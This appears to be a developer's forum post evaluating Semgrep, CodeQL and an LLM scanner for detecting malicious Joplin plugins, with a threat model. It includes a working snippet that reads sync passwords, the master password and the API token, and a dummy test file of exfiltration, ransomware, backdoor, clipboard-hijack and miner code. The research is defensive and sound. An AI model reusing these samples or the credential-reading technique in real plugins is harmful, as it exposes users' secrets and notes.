Hi, as part of my GSoC work I ran three static analysis tools across a set of Joplin plugins to see how well each one detects malicious behavior. Here's what I found.
The Tools
CodeQL is GitHub's semantic analysis engine. It's powerful but requires writing QL queries and building a database per repo - the highest setup cost of the three.
Semgrep is a pattern-based scanner that runs YAML rules against source code. It's the easiest to plug into a CI pipeline and the fastest to get running.
Gemini 3.1 pro preview CLI is Google's AI-assisted tool. It reads the code and produces a structured security report with a risk score and verdict. No custom rules needed.
TESTING :
Semgrep scan: joplin-plugin-jarvis
No custom rules were written; everything the scanner found came from its own default rules.
| File | Rule | Line | Issue |
|---|---|---|---|
| `src/commands/chat.ts` | Non-literal RegExp | 274 | `new RegExp(nc, 'g')`: dynamic regex built from a variable, vulnerable to ReDoS |
| `src/commands/chat.ts` | Non-literal RegExp | 274 | `new RegExp(prompt_override)`: same line, second dynamic argument flagged |
| `src/commands/notes.ts` | Unsafe format string | 157 | `` console.debug(`Skipping note ${noteId}`) ``: variable in log string |
| `src/models/models.ts` | Unsafe format string | 726 | `` console.info(`Jarvis: Loaded ${this.embeddings.length}...`) ``: variable in log string |
| `src/research/papers.ts` | Unsafe format string | 296 | `` console.debug(`Error processing paper ${i}`) ``: variable in log string |
| `src/research/wikipedia.ts` | Unsafe format string | 169 | `` console.debug(`Error processing Wikipedia page ${i}`) ``: variable in log string |
| `src/utils.ts` | Non-literal RegExp | 182 | `new RegExp(patterns.join(''), 'is')`: dynamic regex from a joined array, vulnerable to ReDoS |
OBSERVATION :
The "Unsafe format string" findings are all false positives. They come from the javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring rule, which fires on any variable interpolated into a log string. Excluding that rule removed these alerts.
The "Non-literal RegExp" findings point to a possible ReDoS weakness in the plugin, but that is not the kind of malicious behavior we are looking for either. They come from the javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp rule.
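One way to apply these two exclusions is as a post-processing step over Semgrep's JSON report. The following is only a minimal sketch: it assumes the report was produced with JSON output and uses just the `check_id`, `path`, and `start.line` fields of each result. The helper name `dropExcludedRules` and the sample data are hypothetical.

```typescript
// Subset of the fields Semgrep emits for each entry in `results` (JSON output).
interface SemgrepResult {
  check_id: string;
  path: string;
  start: { line: number };
}

// The two rule IDs named in the observation above.
const UNSAFE_FORMAT_RULE =
  "javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring";
const NON_LITERAL_REGEXP_RULE =
  "javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp";

// Hypothetical helper: keep only findings whose rule ID is not in the excluded list.
function dropExcludedRules(
  results: SemgrepResult[],
  excluded: string[] = [UNSAFE_FORMAT_RULE, NON_LITERAL_REGEXP_RULE],
): SemgrepResult[] {
  const blocked = new Set(excluded);
  return results.filter((r) => !blocked.has(r.check_id));
}

// Illustrative sample, loosely based on the tables in this post.
const sample: SemgrepResult[] = [
  { check_id: UNSAFE_FORMAT_RULE, path: "src/commands/notes.ts", start: { line: 157 } },
  { check_id: NON_LITERAL_REGEXP_RULE, path: "src/utils.ts", start: { line: 182 } },
  { check_id: "eval-detected", path: "src/vulnerabilities.ts", start: { line: 18 } },
];

const kept = dropExcludedRules(sample);
console.log(kept.map((r) => `${r.path}:${r.start.line} ${r.check_id}`));
```

Filtering after the scan keeps the raw report intact, so an excluded rule can be re-enabled later without rescanning.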
After excluding both of these rules, I ran the scan again on plugin-conflict-resolution, this time with custom malicious test code added to it:
| File | Rule | Line | Issue |
|---|---|---|---|
| `src/vulnerabilities.ts` | `react-insecure-request` | 17 | Unencrypted request over HTTP detected (`axios.get('http://malicious.com/code.js')`). |
| `src/vulnerabilities.ts` | `eval-detected` | 18 | Detected the use of `eval()`. May be a code injection vulnerability. |
| `src/vulnerabilities.ts` | `react-insecure-request` | 27 | Unencrypted request over HTTP detected (`fetch('http://malicious.com/steal-db')`). |
| `src/vulnerabilities.ts` | `react-insecure-request` | 43 | Unencrypted request over HTTP detected (`axios.post('http://malicious.com/steal-notes')`). |
| `src/vulnerabilities.ts` | `weak-symmetric-mode` | 49 | Weak cryptographic mode detected (`createCipheriv('aes-256-cbc')`). Recommend AES-256-GCM. |
| `src/vulnerabilities.ts` | `react-insecure-request` | 68 | Unencrypted request over HTTP detected (`fetch('http://malicious.com/exfiltrate-export')`). |
The scanner is still running purely on its own default rules. It caught a few of the things it should catch but missed many. Here is the full breakdown of what it caught and what it missed:
| Threat Category | Code / Attack Mechanism | Scanner Status | Why it happened |
|---|---|---|---|
| Data Exfiltration | `fetch()` / `axios` to malicious.com | Caught | Flagged by `react-insecure-request`. The scanner correctly identified unauthorized HTTP network traffic. |
| Remote Code Execution | `eval(remoteCode.data)` | Caught | Flagged by `eval-detected`. The scanner knows that executing dynamic strings is a massive security risk. |
| System Command Execution | `child_process.exec('curl... bash')` | Missed | Default Node.js rulesets ignore this because legitimate backend web servers use it all the time. |
| Destructive File Access | `fs.readFileSync` & `fsExtra.removeSync` | Missed | Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders. |
| Network Backdoor | `net.createServer(...)` | Missed | Standard Node web apps create servers, so the tool assumes it is safe behavior. |
| Joplin API: Ransomware | `joplin.data.put` (encrypting existing notes) | Missed | The scanner has no knowledge of Joplin's custom API or what `joplin.data.put` does. |
| Joplin API: Malicious Interop | `joplin.interop.registerExportModule` | Missed | The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods. |
These observations show exactly two things:
- Semgrep is completely unaware of what the Joplin APIs are.
- Semgrep is completely unaware that the code it is scanning belongs to a plugin. The code is written in TS/JS, but a plugin should not do everything that standard Node.js code does, such as `fs.readFileSync` and `fsExtra.removeSync` (reading and deleting files) or `child_process.exec('curl... bash')` (running system commands). Even if a plugin does this for a good reason, it should be flagged once so the human reviewer can check what it is actually doing.
CodeQL scan: joplin-plugin-jarvis
Similarly, no custom rules were written for CodeQL; it is doing exactly what it was built to do.
| File | Rule | Line | Issue |
|---|---|---|---|
| `models/openai.ts` | Incomplete URL substring sanitization | 19 | 'azure.com' can be anywhere in the URL, and arbitrary hosts may come before or after it. |
| `models/openai.ts` | Incomplete URL substring sanitization | 26 | 'api.anthropic.com' can be anywhere in the URL, and arbitrary hosts may come before or after it. |
| `utils.ts` | Bad HTML filtering regexp | 374 | This regular expression does not match script end tags like `</script>`. |
| `research/pubmed.ts` | Double escaping or unescaping | 381 | This replacement may produce & characters that are double-unescaped. |
| `research/wikipedia.ts` | Incomplete multi-character sanitization | 125 | This string may still contain `<script`, which may cause an HTML element injection vulnerability. |
| `utils.ts` | Incomplete multi-character sanitization | 373 | This string may still contain `<style`, which may cause an HTML element injection vulnerability. |
| `utils.ts` | Incomplete multi-character sanitization | 373 | This string may still contain `<script`, which may cause an HTML element injection vulnerability. |
RESULT : In short, CodeQL gave better findings than Semgrep. But every result outside the models/ folder was an XSS finding, which Laurent has explicitly said we are not looking for.
The two findings in the models/ folder are SSRF-type issues, which can be useful to know about: the check can be tricked by a custom malicious URL that merely contains 'azure.com' or 'api.anthropic.com' somewhere in it.
Still, this is not "malicious" behavior in the Jarvis plugin itself, so it is not useful for us.
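To illustrate what "Incomplete URL substring sanitization" means, here is a minimal sketch. The Jarvis code itself is not shown in this post, so the naive check below is an assumption about its general shape (a substring test on the URL); both function names are hypothetical.

```typescript
// Substring check of the kind CodeQL flags: it passes for any URL that merely contains the text.
function looksLikeAzureNaive(url: string): boolean {
  return url.includes("azure.com");
}

// Stricter variant: parse the URL and compare the hostname itself.
function isAzureHost(url: string): boolean {
  try {
    const host = new URL(url).hostname.toLowerCase();
    return host === "azure.com" || host.endsWith(".azure.com");
  } catch {
    return false; // not a parseable absolute URL
  }
}

// Illustrative URLs only.
const attackerUrl = "https://evil.example/azure.com/v1/chat";
const realUrl = "https://myresource.openai.azure.com/openai/deployments";

console.log(looksLikeAzureNaive(attackerUrl), isAzureHost(attackerUrl)); // true false
console.log(looksLikeAzureNaive(realUrl), isAzureHost(realUrl)); // true true
```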
After excluding the XSS and SSRF rules from CodeQL's default rules, I ran the scan on plugin-conflict-resolution, again with the custom malicious test code added:
| File | Vulnerability | Line | Issue |
|---|---|---|---|
| `lib/codemirror/mode/markdown/markdown.js` | Inefficient regular expression | 549 | This part of the regular expression may cause exponential backtracking on strings starting with 'a -=' and containing many repetitions of '= -='. |
| `vulnerabilities.ts` | Download of sensitive file through insecure connection | 17 | Download of sensitive file from HTTP source. |

"Inefficient regular expression" is another ReDoS case, which we are not looking for.
Hence, out of all the added code, CodeQL flagged:
| Threat Category | Code / Attack Mechanism | CodeQL Status | Why it happened |
|---|---|---|---|
| Data Exfiltration | `fetch()` / `axios` to malicious.com | Missed | CodeQL did not recognize the outgoing POST/GET requests as unauthorized data leaks. |
| Remote Code Execution | `axios.get` + `eval(remoteCode.data)` | Partially caught | Flagged as "Download of sensitive file through insecure connection". CodeQL caught the dangerous HTTP download, though it ignored the `eval()` itself. |
| System Command Execution | `child_process.exec('curl... bash')` | Missed | Default Node.js rulesets ignore this because legitimate backend web servers use it all the time. |
| Destructive File Access | `fs.readFileSync` & `fsExtra.removeSync` | Missed | Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders. |
| Network Backdoor | `net.createServer(...)` | Missed | Standard Node web apps create servers, so the tool assumes it is safe behavior. |
| Joplin API: Ransomware | `joplin.data.put` (encrypting existing notes) | Missed | The scanner has no knowledge of Joplin's custom API or what `joplin.data.put` does. |
| Joplin API: Malicious Interop | `joplin.interop.registerExportModule` | Missed | The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods. |
These observations also show exactly two things:
- CodeQL is completely unaware of what the Joplin APIs are.
- CodeQL is completely unaware that the code it is scanning belongs to a plugin, which should not do everything that normal TS/JS code may do.
Further architecture analysis :
Any Joplin plugin can call `joplin.settings.globalValues()` with no restrictions and retrieve all sync credentials, the E2EE master password, and the API token, using only the official plugin API, with zero exploits or sandbox escapes.
```typescript
import joplin from "api";

joplin.plugins.register({
  onStart: async function () {
    // Read sensitive global settings through the official plugin API.
    const result = await joplin.settings.globalValues([
      "sync.5.password",
      "sync.6.password",
      "sync.8.password",
      "sync.9.password",
      "sync.10.password",
      "encryption.masterPassword",
      "api.token",
      "encryption.passwordCache",
    ]);
    // Write the values into a new note to show that they are readable.
    await joplin.data.post(["notes"], null, {
      title: "test note for hacker",
      body: JSON.stringify(result),
    });
  },
});
```
Additionally, a plugin developer can get access to both the master key and the master password:
First I tried `joplin.data.get(['master_keys'])`, which is a defined path for fetching the master keys, but it was blocked by a regex filter that does not allow "_" in a path segment:
```typescript
for (const p of path) {
  if (!this.pathSegmentRegex_.test(p)) {
    throw new Error(`Path segments must only contain lowercase letters and digits: ${JSON.stringify(path)}`);
  }
}
```
So I read "syncInfoCache" instead, and it worked: I got the key and the master password.
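The effect of that filter can be reproduced in isolation. This is a sketch under an assumption: the actual value of `pathSegmentRegex_` is not shown here, so the pattern below is inferred from the error message ("lowercase letters and digits") and may differ from Joplin's real one. `rejectedSegments` is a hypothetical helper.

```typescript
// Assumed shape of the check, inferred from the error message; the real pathSegmentRegex_ may differ.
const assumedPathSegmentRegex = /^[a-z0-9]+$/;

// Return the path segments that such a filter would refuse.
function rejectedSegments(path: string[]): string[] {
  return path.filter((segment) => !assumedPathSegmentRegex.test(segment));
}

console.log(rejectedSegments(["master_keys"])); // the underscore makes this segment fail
console.log(rejectedSegments(["notes"])); // nothing rejected
```

The filter only guards the data API path, which is why reading the same material through a settings key is not affected by it.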
I believe Joplin settings and plugins currently work on the assumption that "if a user has installed a plugin, they trust it", i.e. the plugin gets access to all defined settings. Since we are moving from a trust-by-default to a review-by-default model, it would be good to have a flag for this specific bypass.
A plugin can read a secret and silently send it out through a network request without the user ever knowing, or it can read both the key and the password of the user.
Update to threat model :
What it is: The plugin attempts to read or extract the application's Master Password, Master Encryption Keys, or Sync Target Credentials, regardless of the API path used. Because plugins operate in a trusted environment, extracting these assets constitutes a compromise of the user's privacy and must be flagged for review.
Known Attack Vectors:
- Calling `joplin.settings.globalValue` or `globalValues` explicitly targeting "syncInfoCache", "encryption.masterPassword", "sync.*.password", "api.token", "encryption.cachedPpk", or "encryption.passwordCache" should be flagged once for review.
- Additionally, if the data is read and then piped into a network request, saved silently to a note, written to the local file system, passed to a system command (`child_process`), or injected into an external webview, it should be marked as critical and a must-review case.
- If both "encryption.masterPassword" and the encryption key are fetched by a plugin, it should also be marked for review.
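The first attack vector above boils down to matching setting keys against a short list of patterns. Below is a minimal sketch of that matching step only, written in plain TypeScript rather than as a scanner rule. The helper names are hypothetical, and treating `*` as "one dot-free segment" is my assumption about how `sync.*.password` should be read.

```typescript
// Key patterns taken from the attack vectors listed above; "*" stands for one dot-free segment.
const SENSITIVE_KEY_PATTERNS: string[] = [
  "syncInfoCache",
  "encryption.masterPassword",
  "sync.*.password",
  "api.token",
  "encryption.cachedPpk",
  "encryption.passwordCache",
];

// Convert a pattern such as "sync.*.password" into an anchored RegExp.
function patternToRegExp(pattern: string): RegExp {
  const escaped = pattern
    .split("*")
    .map((part) => part.replace(/[.+?^${}()|[\]\\]/g, "\\$&"))
    .join("[^.]+");
  return new RegExp(`^${escaped}$`);
}

function isSensitiveSettingKey(key: string): boolean {
  return SENSITIVE_KEY_PATTERNS.some((p) => patternToRegExp(p).test(key));
}

// Naive literal scan: pull quoted strings out of source text and keep the sensitive ones.
function findSensitiveKeys(source: string): string[] {
  const literals = source.match(/(["'])[^"'\n]+\1/g) ?? [];
  return literals.map((lit) => lit.slice(1, -1)).filter(isSensitiveSettingKey);
}

const snippet = `joplin.settings.globalValues(["sync.5.password", "locale"])`;
console.log(findSensitiveKeys(snippet));
```

A literal scan like this misses keys that are built at runtime (for example by string concatenation), which is one reason the "flag for review" wording matters more than the exact matcher.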
Threat Model :
All of the above observations show the need to write custom rules for the tools and to define a threat model that tells them what we have to detect.
Since human review is a mandatory part of the pipeline, the threat model has to cover both "this is bad" and "this may be bad" scenarios, so the reviewer knows what needs to be reviewed.
Tools by themselves do not know what a person wants to see flagged in the code. With the custom rules / threat model, we tell the tool which things we want flagged, so that the human reviewer can read the report in the issue and quickly check it.
Following is the threat model that I have defined so far, with the exact reason why each item should be flagged:
Phase 1: Critical Threats
- Dynamic Code Execution: The plugin downloads a hidden script from the internet and executes it dynamically. Attack Vectors: Usage of `eval()` or bypassing `joplin.require` to use native `require('child_process')` with remote payloads.
- Secret & Key Theft: The plugin attempts to read the application's Master Password, Encryption Keys, or Sync Credentials. Attack Vectors: Calling `joplin.settings.globalValue(s)` targeting `syncInfoCache`, `encryption.masterPassword`, `encryption.cachedPpk`, `encryption.passwordCache`, `sync.*.password`, `sync.*.auth`, `sync.*.context`, `sync.5.username`, `sync.6.username`, `sync.9.username`, `sync.10.username`, `sync.10.userEmail`, `sync.userId`, or `clientId`. This is critical if the data is piped to a network request, written to disk, passed to `child_process`, or injected into an external webview.
- Electron Main Process Takeover: Gaining direct access to the main Electron process to control the app window or bypass renderer restrictions. Attack Vectors: Any import or requirement of `@electron/remote`.
- Archive Extraction Attack: Using maliciously crafted zip files to overwrite sensitive files outside the intended directory, silently replacing `database.sqlite` or config files. Attack Vectors: Usage of `joplin.fs.archiveExtract()` where either argument originates from user input or a remotely fetched source. This should be flagged so a reviewer can see what the zip extraction is actually doing.
- Mass Data Destruction: Iterating through notes or folders and permanently destroying the user's database. Attack Vectors: `joplin.data.delete()` appearing inside a loop iterating over `joplin.data.get(['notes'])` or `joplin.data.get(['folders'])`. The LLM should check the purpose of the iteration and report accordingly.
- Keylogging & Silent Surveillance: Silently monitoring everything a user reads or types in real time and exfiltrating it. Attack Vectors: `onNoteContentChange` or `onNoteChange` combined directly with network requests (`fetch`, `axios`).
- Unauthorized FS Access & Self-Modification: Bypassing official APIs to read/rewrite core configs (`database.sqlite`), or rewriting its own source files after installation to swap code for malware. Attack Vectors: Usage of native `fs` or `joplin.require('fs-extra')` targeting `__dirname + '/index.js'` or `~/.config/joplin-desktop`.
- Network Backdoors: Opening a listening port on the user's local network. Attack Vectors: Usage of `net.createServer()`.
- Clipboard Hijacking: Rapidly reading the clipboard to find sensitive data and swapping it. Attack Vectors: Background loops calling `joplin.clipboard.readText()` and `joplin.clipboard.writeText()`.
- Native Binary & Cryptojacking: Dynamically downloading/unpacking compiled binaries, spawning miners, or using Web Workers for crypto-mining. Attack Vectors: Exploiting Node.js integration via `child_process` or hidden `BrowserWindow`s.
- Native Module Imports: Bypassing the `joplin.require()` API to gain full host machine access. Attack Vectors: Direct imports of `child_process`, `net`, `os`, `dgram` via `require()`, `window.require()`, or TypeScript `import` statements.
- Silent Data Persistence: Storing execution commands or exfiltrated data invisibly. Attack Vectors: Reading data previously stored with `joplin.data.userDataSet()` and passing the result directly to `eval()`, `exec()`, or `fetch()`.
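As an illustration of the "Native Module Imports" item, here is a rough text-level sketch of what such a check looks for. It is not one of the actual Semgrep or CodeQL rules (those are not reproduced in this post), and a regex over source text is much weaker than an AST or data-flow query. `findNativeImports` and the sample source are hypothetical.

```typescript
// Modules named in the "Native Module Imports" item above.
const NATIVE_MODULES: string[] = ["child_process", "net", "os", "dgram"];

// Report which native modules are loaded via require(), window.require(), or an import statement.
// Calls that go through joplin.require(...) are deliberately not matched.
function findNativeImports(source: string): string[] {
  return NATIVE_MODULES.filter((mod) => {
    const pattern = new RegExp(
      `(?:(?<!joplin\\.)require\\(\\s*|from\\s+)["']${mod}["']`,
    );
    return pattern.test(source);
  });
}

const pluginSource = [
  `import * as net from 'net';`,
  `const cp = require("child_process");`,
  `const fs = joplin.require('fs-extra');`,
].join("\n");

console.log(findNativeImports(pluginSource)); // [ 'child_process', 'net' ]
```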
Phase 2: Dual-Use Data Flows
- Command Execution: Running terminal commands via `child_process`. Attack Vectors: Data flowing into shell execution. The reviewer must verify if it is a legitimate tool or a malicious script.
- Data Exfiltration: Using `joplin.data.get` to bulk-read notes and piping that data into `fetch()` or `axios`. Attack Vectors: Note data flowing to network. The reviewer must verify the destination URL.
- Mass Encryption / Ransomware: A flow combining note reading, cryptographic modules, and overwriting the originals. Attack Vectors: `joplin.data.get` piped to `joplin.data.put` via `crypto`. The reviewer must verify whether this is just an encryption feature or not.
- Silent Backup Hijacking: Registering a custom export format while secretly piping the plaintext data to an external server. Attack Vectors: `fetch()` or network requests inside a `joplin.interop.registerExportModule` callback.
- Malicious Import Module: Registering a custom import format that injects malicious notes, corrupts the database, or drops payload files. Attack Vectors: Malicious payloads inside a `joplin.interop.registerImportModule` callback.
- Remote External Webviews: Creating a UI panel but setting the source to an external URL. Attack Vectors: `<iframe src="...">` in panel HTML. The reviewer must verify the trusted status of the external service.
False Positive:
Several Phase 2 items are dual-use by nature and will flag legitimate plugins (e.g., child_process for Python integrations, fetch + data.get). This is intentional. Phase 2 exists precisely because human review is mandatory. The LLM scanner is prompted to consider context before flagging, reducing noise compared to rule-based tools.
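The split between the two phases could be carried into the report as a simple triage step. The sketch below is only one possible shape: the `Finding` fields and the three verdict labels are hypothetical and not taken from any tool's output.

```typescript
type Phase = 1 | 2;

// Hypothetical finding shape; field names are illustrative only.
interface Finding {
  rule: string;
  phase: Phase;
  file: string;
  line: number;
}

type Verdict = "critical-review" | "manual-review" | "clean";

// Any Phase 1 finding escalates the whole plugin; Phase 2 findings alone only request a human look.
function triage(findings: Finding[]): Verdict {
  if (findings.some((f) => f.phase === 1)) return "critical-review";
  if (findings.length > 0) return "manual-review";
  return "clean";
}

const dualUseOnly: Finding[] = [
  { rule: "command-execution", phase: 2, file: "src/index.ts", line: 10 },
];
const withCritical: Finding[] = [
  ...dualUseOnly,
  { rule: "secret-key-theft", phase: 1, file: "src/index.ts", line: 22 },
];

console.log(triage([]), triage(dualUseOnly), triage(withCritical));
```

Keeping Phase 2 as "manual-review" rather than a failure matches the intent above: a legitimate plugin that shells out to Python is surfaced to the reviewer, not rejected.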
Note : This threat model mostly consists of data flows, which is why it is no longer practical to express it as custom Semgrep rules. At the end of the SAST section I have included a small study that tests specifically why Semgrep cannot be used anymore.
Also, a few new threats were added after the initial tests, so the tests below were run with slightly less threat model coverage.
Here is the report CodeQL generated on plugin-conflict-resolution with the custom malicious code:
| Vulnerability / Rule | Description | Severity | File | Position (Line:Col) |
|---|---|---|---|---|
| Unauthorized Native Module Bypasses | Detects direct imports of 'child_process', bypassing the safe 'joplin.require' method. | warning | `/vulnerabilities.ts` | 2:8 - 2:25 |
| Network Backdoors | Detects local servers being spun up which may indicate a backdoor. | warning | `/vulnerabilities.ts` | 30:20 - 33:6 |
| Data Exfiltration (Notes to Network) | Detects Joplin notes data flowing to external network requests. | warning | `/vulnerabilities.ts` | 43:58 - 43:62 |
| Direct File System / Sandbox Escape | Detects hardcoded sensitive paths or traversals flowing into file system APIs. | warning | `/vulnerabilities.ts` | 26:36 - 26:41 |
| Secret and Key Theft | Detects sensitive environment variables or settings data exfiltrated via network requests. | warning | `/vulnerabilities.ts` | 22:17 - 22:65 |
CodeQL generated a good report, was able to catch cross-file code, and gave the exact lines to look at. The threat model seems to work well, as it improved the CodeQL results a lot:
| Threat Category | Code / Attack Mechanism | Status |
|---|---|---|
| Data Exfiltration | `fetch()` / `axios` to malicious.com | |
| Remote Code Execution | `axios.get` + `eval(remoteCode.data)` | |
| System Command Execution | `child_process.exec('curl... bash')` | |
| Destructive File Access | `fs.readFileSync` & `fsExtra.removeSync` | |
| Network Backdoor | `net.createServer(...)` | |
| Joplin API: Ransomware | `joplin.data.put` (encrypting existing notes) | |
| Joplin API: Malicious Interop | `joplin.interop.registerExportModule` | |

(It returned clean for Jarvis.)
RESULT :
CodeQL gave good results once it was told what to look for. However, as seen earlier, CodeQL could not identify most of the things we want to see without the custom rules. This means its report is now bound to the threat model: we will mostly see only what the threat model describes, which leaves a huge zero-day blind spot.
LLM as a scanner :
An LLM would be a great tool to use here, because the main problems with the other tools are their lack of context about what the Joplin plugin API actually is and the need to define a threat model to write custom rules against.
Many Joplin plugins are written by community developers, so even with a threat model defined, new things that a reviewer wants to see in the report will keep coming up.
An LLM is not bound to any rule or threat model. The threat model is still included in the prompt, but LLMs are also good enough to report previously unseen (zero-day) malicious code.
The scan result from Gemini 3.1 Pro Preview with the threat model defined, on joplin-plugin-jarvis:
The scan result from Gemini 3.1 Pro Preview with the threat model defined, on plugin-conflict-resolution with the custom malicious code:
| Threat Category | Code / Attack Mechanism | LLM Status |
|---|---|---|
| Data Exfiltration | `joplin.data.get` -> `axios.post()` | |
| Remote Code Execution | `axios.get()` + `eval()` | |
| System Command Execution | `child_process` (curl... bash) | |
| Secret & Key Theft | `process.env` -> `fetch()` | |
| Sandbox Escape / File Access | `fs` (SQLite) / `fs-extra` (absolute) | |
| Network Backdoor | `net.createServer().listen(1337)` | |
| Joplin API: Ransomware | Read -> `crypto.createCipheriv` -> Put | |
| Joplin API: Malicious Interop | `registerExportModule` -> `fetch()` | |
The threat model seems to be working correctly. The well-known joplin-plugin-jarvis, which is not malicious, was not flagged as malicious, while its use of `fetch()` after `joplin.data.get` was flagged so a human reviewer can check that nothing is wrong.
Additionally, the LLM is not bound to only the threat model. It looks through the code and checks whether there is anything else that should be flagged, similar to what the threat model defines.
More observations :
Why were these tests done?
To verify whether the threat model generates any noise and, if it does, whether that noise is useful and should be added to the threat model.
Additionally, the LLM was used to scan for any flow used by a plugin that should be added to the threat model.
The 4 most popular plugins all passed the LLM and CodeQL scans with a clean result:
Note : The LLM was also free to look for malicious code patterns similar to those in the threat model.
- joplin-inline-todo: Clean
- joplin-rich-markdown: Clean
- plugin-templates: Clean
- plugin-yesyoukan: Clean
CodeQL produced a little noise on plugin-templates:
| Issue / Rule | Severity | File Location | Description |
|---|---|---|---|
| Useless regular-expression character escape | Error | `/parser.ts` (Line 211, Col 48, Col 63) | The escape sequence `\S` is equivalent to just `S`. Prepending a backslash to an ordinary character in a string does not have any effect. |

This is a code quality finding from the "*useless-regexp-character-escape*" rule, which is now excluded from the rules.
Tests :
- joplin-math-mode: Clean
- joplin-note-tabs: Clean
- joplin-plugin-extra-editor-settings: Clean
- joplin-plugin-quick-links: Clean
- joplin-inline-tags-plugin: Clean
- joplin-plugin-combine-notes: Clean
- joplin-plugin-diff-tool: Clean
- joplin-plugin-table-formatter: Clean
New updates to the threat model after these tests:
- Self-Modifying Code / Silent Payloads: What it is: The plugin uses `fs` or `fs-extra` to rewrite its own source files (e.g., overwriting `__dirname + '/index.js'`) after installation to swap code for malware, bypassing initial CI scans.
- Cryptojacking / Resource Theft: What it is: Exploiting Node.js integration to use `child_process` to spawn native mining binaries, or utilizing Web Workers in a hidden `BrowserWindow` to run crypto-miners in the background.

Now I had all the rules written. I made a file containing dummy code for every rule scenario to check how both CodeQL and the LLM would perform:
```typescript
import joplin from 'api';
import * as child_process from 'child_process';
import * as net from 'net';
import * as crypto from 'crypto';

const fs = joplin.require("fs-extra");

export async function codeql_test_dynamic_code_execution() {
  const response = await fetch('https://example.com/payload.js');
  const payload = await response.text();
  eval(payload);
}

export async function codeql_test_secret_theft() {
  const masterPassword = await joplin.settings.globalValue('encryption.masterPassword');
  const syncCache = await joplin.settings.globalValue('syncInfoCache');
  await fetch('https://example.com/exfiltrate', {
    method: 'POST',
    body: JSON.stringify({ p: masterPassword, s: syncCache })
  });
}

export async function codeql_test_unauthorized_fs_access() {
  const pluginDir = __dirname;
  const targetFile = `${pluginDir}/index.js`;
  fs.writeFileSync(targetFile, "console.log('malware swapped');");
}

export async function codeql_test_network_backdoors() {
  const server = net.createServer((c) => {
    c.write('backdoor active\r\n');
  });
  server.listen(8124);
}

export async function codeql_test_clipboard_hijacking() {
  const clipContent = await joplin.clipboard.readText();
  if (clipContent.includes('wallet')) {
    await joplin.clipboard.writeText('attacker_wallet_address');
  }
}

export async function codeql_test_cryptojacking() {
  child_process.exec('xmrig -o pool.minexmr.com:4444 -u wallet_addr');
}

export async function codeql_test_command_execution() {
  const userCmd = "ls -la";
  child_process.exec(userCmd);
}

export async function codeql_test_data_exfiltration() {
  const notes = await joplin.data.get(['notes']);
  await fetch('https://example.com/sync', {
    method: 'POST',
    body: JSON.stringify(notes)
  });
}

export async function codeql_test_mass_encryption() {
  const notes = await joplin.data.get(['notes']);
  for (const note of notes.items) {
    const cipher = crypto.createCipheriv('aes-256-cbc', 'key', 'iv');
    let encrypted = cipher.update(note.body, 'utf8', 'hex');
    encrypted += cipher.final('hex');
    await joplin.data.put(['notes', note.id], null, { body: encrypted });
  }
}

export async function codeql_test_backup_hijacking() {
  await joplin.interop.registerExportModule({
    format: 'custom',
    description: 'Custom Export',
    target: fs.Directory,
    isNoteArchive: false,
    onInit: async (context: any) => {
      const data = context.exportData;
      await fetch('https://example.com/steal_backup', { method: 'POST', body: data });
    },
    onProcessItem: async (context: any, itemType: number, item: any) => {},
    onProcessResource: async (context: any, resource: any, filePath: string) => {},
    onClose: async (context: any) => {}
  });
}

export async function codeql_test_remote_webviews() {
  const htmlContent = `<iframe src="https://example.com/remote_app"></iframe>`;
  const view = await joplin.views.panels.create('panel_1');
  await joplin.views.panels.setHtml(view, htmlContent);
}
```
Result :
| # | Threat | Phase | Maliciousness | LLM Scan | CodeQL |
|---|---|---|---|---|---|
| 1 | Dynamic Code Execution | 1 | | | |
| 2 | Secret & Key Theft | 1 | | | |
| 3 | Unauthorized FS / Self-Modification | 1 | | | |
| 4 | Network Backdoor | 1 | | | |
| 5 | Clipboard Hijacking | 1 | | | |
| 6 | Cryptojacking / Binary Dropping | 1 | | | |
| 7 | Command Execution | 2 | | | |
| 8 | Data Exfiltration (notes -> network) | 2 | | | |
| 9 | Mass Encryption / Ransomware | 2 | | | |
| 10 | Silent Backup Hijacking | 2 | | | |
| 11 | Remote Webview Scripts | 2 | | | |
Originally, only the LLM caught all the threats. The CodeQL rules performed very poorly and caught only 3 of the 11 threats. Several changes were needed to make CodeQL catch all of them.
Trade-offs : CodeQL is not good at following complex data flows, for example data that is extracted, wrapped in a new object, and then passed to `JSON.stringify`. Here CodeQL lost track of the data and did not know that the new object contains the data we are following.
What had to be done to solve it? : Several new rules were added and old rules were updated to simply check:
- Do `data.get()` and `fetch` appear in the same function?
- Do `data.get()`, a crypto call, and `joplin.data.put()` appear in the same file?
- Is there a `fetch()` or file write inside a `registerExportModule` callback?

etc.
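The idea behind these fallback checks is co-occurrence rather than data flow: a finding is raised when all the relevant calls appear in the same scope, whether or not the data can be traced between them. The real rules are CodeQL queries that are not reproduced here; the sketch below only illustrates the idea in TypeScript, with hypothetical rule names and regex patterns.

```typescript
// A rule fires when every pattern appears somewhere in the same piece of code.
interface CoOccurrenceRule {
  name: string;
  mustContain: RegExp[];
}

// Hypothetical rules mirroring the first two checks listed above.
const CO_OCCURRENCE_RULES: CoOccurrenceRule[] = [
  {
    name: "data-exfiltration",
    mustContain: [/joplin\.data\.get\s*\(/, /\bfetch\s*\(/],
  },
  {
    name: "mass-encryption",
    mustContain: [/joplin\.data\.get\s*\(/, /createCipheriv\s*\(/, /joplin\.data\.put\s*\(/],
  },
];

// Return the names of all rules whose patterns all occur in the given scope (function body or file).
function matchCoOccurrence(scopeSource: string): string[] {
  return CO_OCCURRENCE_RULES
    .filter((rule) => rule.mustContain.every((re) => re.test(scopeSource)))
    .map((rule) => rule.name);
}

const exfiltrationBody = `
  const notes = await joplin.data.get(['notes']);
  await fetch('https://example.com/sync', { method: 'POST', body: JSON.stringify(notes) });
`;

console.log(matchCoOccurrence(exfiltrationBody)); // [ 'data-exfiltration' ]
```

Because nothing here follows the data, the `JSON.stringify` wrapping that broke taint tracking no longer matters, but the same looseness means the check also fires when the two calls are unrelated.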
Though these rules solve the problem for now, I am sure CodeQL still has a lot of blind spots.
Additionally, CodeQL also caught these extra things:
| Threat / Finding | What it is |
|---|---|
